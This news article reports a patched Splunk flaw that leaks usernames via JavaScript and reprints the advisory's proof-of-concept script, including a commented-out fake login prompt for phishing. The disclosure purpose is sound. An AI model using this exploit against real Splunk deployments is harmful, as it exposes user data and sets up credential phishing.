That sound you hear is Splunk leaking data

Visit a malicious web page and JavaScript extracts user names


Splunk has patched a slip in its JavaScript implementation that leaks user information.

The advisory at Full Disclosure explains that the leak happens if an attacker tricks an authenticated user into visiting a malicious Web page.

It only leaks the username, and whether or not that user has enabled remote access; but this would provide enough for an attacker to try follow-up phishing attacks to try and get the user's credentials.

The bug, the advisory says, is how Splunk used Object prototypes in JavaScript.

Here's the proof-of-concept JavaScript from the advisory:

<script>
Object.defineProperty( Object.prototype, "$C", { set:function(val){
   //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername:
"+val.USERNAME, "Password")
for(var i in val){
 alert(""+i+" "+val[i]);
  }
 }
});
</script>

<script src="https://VICTIM-IP:8000/en-US/config?autoload=1" type="text/javascript">
</script>

The issue affects Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2, and the company has issued patches for all versions. ®

Broader topics


Other stories you might like

  • Splunk dabbles in edgy hardware, lowers data ingestion
    'Puck' hardware demoed with customers including Royal Dutch Shell to address big concern: cost

    Splunk has released a major update to its core data-crunching platform, emphasizing reductions in the quantity of data ingested and therefore the cost of operations.

    It also addresses a few security flaws that may not be fixable in earlier editions. The release is called Splunk 9.0.

    As explained to The Register by Splunk senior vice president Garth Fort, the changes reflect users' concerns that Splunk sucked up so much data that using the application had become very expensive. Fort even cited a joke that did the rounds when Cisco was said to have $20 billion earmarked to spend on Splunk and observers couldn't be sure if that was the sum needed to buy the company or just pay for licences.

    Continue reading
  • How refactoring code in Safari's WebKit resurrected 'zombie' security bug
    Fixed in 2013, reinstated in 2016, exploited in the wild this year

    A security flaw in Apple's Safari web browser that was patched nine years ago was exploited in the wild again some months ago – a perfect example of a "zombie" vulnerability.

    That's a bug that's been patched, but for whatever reason can be abused all over again on up-to-date systems and devices – or a bug closely related to a patched one.

    In a write-up this month, Maddie Stone, a top researcher on Google's Project Zero team, shared details of a Safari vulnerability that folks realized in January this year was being exploited in the wild. This remote-code-execution flaw could be abused by a specially crafted website, for example, to run spyware on someone's device when viewed in their browser.

    Continue reading
  • Cisco warns of security holes in its security appliances
    Bugs potentially useful for rogue insiders, admin account hijackers

    Cisco has alerted customers to another four vulnerabilities in its products, including a high-severity flaw in its email and web security appliances. 

    The networking giant has issued a patch for that bug, tracked as CVE-2022-20664. The flaw is present in the web management interface of Cisco's Secure Email and Web Manager and Email Security Appliance in both the virtual and hardware appliances. Some earlier versions of both products, we note, have reached end of life, and so the manufacturer won't release fixes; it instead told customers to migrate to a newer version and dump the old.

    This bug received a 7.7 out of 10 CVSS severity score, and Cisco noted that its security team is not aware of any in-the-wild exploitation, so far. That said, given the speed of reverse engineering, that day is likely to come. 

    Continue reading

Biting the hand that feeds IT © 1998–2022